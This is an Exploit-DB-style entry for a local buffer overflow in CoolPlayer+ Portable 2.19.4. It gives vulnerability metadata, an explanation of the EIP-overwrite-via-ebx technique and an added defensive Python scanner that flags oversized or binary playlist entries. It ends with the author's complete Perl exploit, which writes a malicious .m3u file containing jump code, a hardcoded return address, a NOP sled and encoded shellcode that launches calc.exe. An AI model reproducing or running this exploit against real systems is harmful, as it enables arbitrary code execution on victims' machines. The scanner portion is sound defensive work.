Vendor: CoolPlayer+ Portable
Author: Mike Czumak
CVSS: 7.5 (HIGH)
Vulnerability Type: Local Buffer Overflow
CWE: 119
Product Name: CoolPlayer+ Portable
Affected Version From: 2.19.4
Affected Version To: 2.19.4
Patch Exists: NO
Related CWE:
CPE: a:coolplayer_project:coolplayer_portable:2.19.4
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
Year: 2013

CoolPlayer+ Portable v2.19.4 – Local Buffer Overflow

Creates an .m3u file for a simple EIP overwrite. The buffer is mangled at esp (leaving less than about 400 bytes of usable shellcode space there), so ebx, which points to the start of the buffer, is the better register to use. eip is first overwritten with the address of a call ebx, which lands at the beginning of the buffer; the short code placed there adds 300 to ebx to jump past the eip overwrite and into the shellcode (available space > 9400 bytes).

Mitigation:

Apply patches or updates provided by the vendor.
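The entry above describes a playlist file whose single entry is roughly 10,000 bytes of filler and machine code, which no legitimate .m3u entry (a file path or a URL) ever looks like. As an added defensive example, not part of the Exploit-DB entry or the author's script, the following Python heuristic flags playlist entries whose length or byte content is inconsistent with a path or URL; the thresholds, function names and sample playlists are constructed assumptions, and the oversized sample is plain filler with no payload.

```python
"""Heuristic scanner for oversized or binary-looking entries in .m3u playlists.

Added example for triage of untrusted playlist files; thresholds are assumptions.
"""
import string

# Bytes a path or URL entry is expected to consist of (ASCII printable set).
PRINTABLE = set(bytes(string.printable, "ascii"))


def scan_m3u(data: bytes, max_line_len: int = 1024, max_binary_ratio: float = 0.05):
    """Return (line_number, length, non_printable_ratio, reasons) for each suspicious line.

    A playlist entry is a file path or URL, so a line thousands of bytes long, or one
    made mostly of non-printable bytes, is not a legitimate entry and is worth flagging
    before the file reaches a player that parses entries into a fixed-size buffer.
    """
    findings = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line:
            continue  # blank lines carry nothing
        non_printable = sum(1 for b in line if b not in PRINTABLE)
        ratio = non_printable / len(line)
        reasons = []
        if len(line) > max_line_len:
            reasons.append(f"entry length {len(line)} exceeds {max_line_len}")
        if ratio > max_binary_ratio:
            reasons.append(f"{non_printable} non-printable bytes ({ratio:.0%})")
        if reasons:
            findings.append((lineno, len(line), ratio, reasons))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when any entry trips a heuristic."""
    return bool(scan_m3u(data))


# Constructed sample inputs (not taken from the page).
BENIGN_PLAYLIST = (
    b"#EXTM3U\r\n"
    b"#EXTINF:215,Artist - Title\r\n"
    b"C:\\Music\\track01.mp3\r\n"
    b"http://example.invalid/stream.mp3\r\n"
)
# An oversized entry: 10,000 filler bytes plus a few high bytes. This mirrors only the
# general shape (one very long entry) of the file described above, with no payload.
OVERSIZED_PLAYLIST = b"#EXTM3U\n" + b"A" * 10000 + bytes(range(0x80, 0x90)) + b"\n"
# A short entry made entirely of non-printable bytes, to exercise the ratio check.
BINARY_PLAYLIST = b"track.mp3\n" + bytes(range(0x80, 0xA0)) + b"\n"

if __name__ == "__main__":
    samples = (("benign", BENIGN_PLAYLIST), ("oversized", OVERSIZED_PLAYLIST),
               ("binary", BINARY_PLAYLIST))
    for name, sample in samples:
        hits = scan_m3u(sample)
        if not hits:
            print(f"{name}: no findings")
        for lineno, length, _ratio, reasons in hits:
            print(f"{name}: line {lineno} ({length} bytes): " + "; ".join(reasons))
```

This is a triage check for a download or mail gateway, not a fix: the length limit only catches the gross case, and a title in a #EXTINF line written in a non-ASCII encoding can trip the ratio check, so tune the thresholds to the playlists actually seen. The vulnerability itself is removed only by the application bounds-checking the entry it copies, which is what a vendor patch would have to do.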
Source

Exploit-DB raw data:

#!/usr/bin/perl

############################################################################################################
# Exploit Title: CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow
# Date: 11-15-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: CoolPlayer+ Portable v2.19.4
# Software Link: http://portableapps.com/apps/music_video/coolplayerp_portable
# Version: 2.19.4
# Tested On: Windows XP SP3
#
# Credits: Seems various versions of this software have been vulnerable to BOF for a while
# -- http://www.exploit-db.com/exploits/4839/
#
# Details: Creates an .m3u file for a simple EIP overwrite
# -- Buffer is mangled at esp (shellcode size < ~400) so ebx is better choice
# -- First overwrite eip with call ebx which points to beginning of buffer
# -- Add 300 to ebx to jump past the eip overwrite and into shellcode (available space > 9400)
############################################################################################################

my $buffsize = 10000; # set consistent buffer size

my $jmp = "\x83\xc3\x64" x 3; # add 300 to ebx which will jump beyond eip overwrite and into nops/shellcode
$jmp = $jmp . "\xff\xe3"; # jmp ebx

my $junk = "\x41" x (260 - length($jmp)); # fill remainder of start of buffer to eip overwrite at offset 260

my $eip = pack('V',0x7c810395); # call ebx [kernel32.dll] which points to start of buffer and our jump code (no usable application module found)

my $nops = "\x90" x 50;

# Calc.exe payload [size 227]
# msfpayload windows/exec CMD=calc.exe R | 
# msfencode -e x86/shikata_ga_nai -c 1 -b '\x00\x0a\x0d\xff'
my $shell = "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9" .
"\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92" .
"\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84" .
"\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e" .
"\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1" .
"\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27" .
"\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb" .
"\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b" .
"\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2" .
"\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37" .
"\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3" .
"\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef" .
"\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb" .
"\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf" .
"\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83" .
"\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3" .
"\x9a\xca\xc0";

my $sploit = $jmp.$junk.$eip.$nops.$shell; # build sploit portion of buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency
my $buffer = $sploit.$fill; # build final buffer

# write the exploit buffer to file
my $file = "coolplayer.m3u";
open(FILE, ">$file") or die "Cannot open $file for writing: $!";
binmode(FILE); # write the raw bytes unchanged
print FILE $buffer;
close(FILE);
print "Exploit file [" . $file . "] created\n";
print "Buffer size: " . length($buffer) . "\n";